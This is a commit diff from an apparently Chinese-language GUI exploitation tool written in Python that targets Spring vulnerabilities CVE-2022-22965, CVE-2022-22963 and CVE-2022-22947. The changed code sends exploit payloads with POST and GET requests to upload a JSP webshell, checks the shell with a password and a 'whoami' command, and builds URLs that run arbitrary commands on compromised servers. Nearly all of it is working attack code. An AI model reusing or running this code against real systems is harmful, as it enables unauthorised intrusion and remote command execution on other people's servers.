@@ -46,7 +46,7 @@ def __init__(self):
46
46
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" ,
47
47
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0" ,
48
48
"Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00" )
49
- cves = ("CVE-2022-22965" ,"CVE-2022-22963" ,"CVE-2022-22947" ,"22965-aabyss-shell" ,"22965-13exp -shell" )
49
+ cves = ("CVE-2022-22965" ,"CVE-2022-22963" ,"CVE-2022-22947" ,"22965-13exp-shell" , "22965- aabyss-shell-post " ,"22965-aabyss -shell-get " )
50
50
no_proxies = []
51
51
proxy_list = []
52
52
self .root = tk .Tk ()
@@ -673,22 +673,27 @@ def CVE_2022_22965_aabysszg(self, url, proxies):
673
673
data1 = payload_linux
674
674
data2 = payload_win
675
675
getpayload = url + payload_http
676
+ Vule = self .CVEs .get ()
676
677
try :
677
678
requests .packages .urllib3 .disable_warnings ()
678
679
if proxies != "" :
679
- requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
680
- sleep (1 )
681
- requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
682
- sleep (1 )
683
- requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
684
- sleep (1 )
680
+ if Vule == "22965-aabyss-shell-post" :
681
+ requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
682
+ sleep (1 )
683
+ requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
684
+ sleep (1 )
685
+ elif Vule == "22965-aabyss-shell-get" :
686
+ requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
687
+ sleep (1 )
685
688
else :
686
- requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False )
687
- sleep (1 )
688
- requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False )
689
- sleep (1 )
690
- requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False )
691
- sleep (1 )
689
+ if Vule == "22965-aabyss-shell-post" :
690
+ requests .post (url , headers = Headers_1 , data = data1 , timeout = 6 , allow_redirects = False , verify = False )
691
+ sleep (1 )
692
+ requests .post (url , headers = Headers_1 , data = data2 , timeout = 6 , allow_redirects = False , verify = False )
693
+ sleep (1 )
694
+ elif Vule == "22965-aabyss-shell-get" :
695
+ requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False )
696
+ sleep (1 )
692
697
test = requests .get (url + "tomcatwar.jsp" )
693
698
if (test .status_code == 200 ) and ('aabysszg' in str (test .text )):
694
699
back = "[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami"
@@ -833,7 +838,7 @@ def cve_2022_22965_exec(self):
833
838
cmd = self .reverse_tcp .get ()
834
839
if self .CVEs .get () == 'CVE-2022-22965' :
835
840
url_shell = url + "shell.jsp?cmd={}" .format (cmd )
836
- elif self . CVEs . get () == '22965-aabyss-shell' :
841
+ elif '22965-aabyss-shell' in self . CVEs . get () :
837
842
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}" .format (cmd )
838
843
elif self .CVEs .get () == '22965-13exp-shell' :
839
844
url_shell = url + "wbexp.jsp?pwd=13exp&cmd={}" .format (cmd )
@@ -1029,7 +1034,7 @@ def Vule(self):
1029
1034
self .CVE_2022_22963 (i , proxies ,execcmd )
1030
1035
elif Vule == "CVE-2022-22947" :
1031
1036
self .CVE_2022_22947 (i , proxies ,execcmd )
1032
- elif Vule == "22965-aabyss-shell" :
1037
+ elif "22965-aabyss-shell" in Vule :
1033
1038
self .CVE_2022_22965_aabysszg (i , proxies )
1034
1039
1035
1040
else :
@@ -1051,7 +1056,7 @@ def Vule(self):
1051
1056
messagebox .showinfo ("提示" ,"执行命令不能为空,请重试!" )
1052
1057
else :
1053
1058
self .CVE_2022_22947 (url , proxies ,execcmd )
1054
- elif Vule == "22965-aabyss-shell" :
1059
+ elif "22965-aabyss-shell" in Vule :
1055
1060
back = self .CVE_2022_22965_aabysszg (url , proxies )
1056
1061
if "[-]" in back :
1057
1062
back = "[+]执行二次验证中 等待5秒"
0 commit comments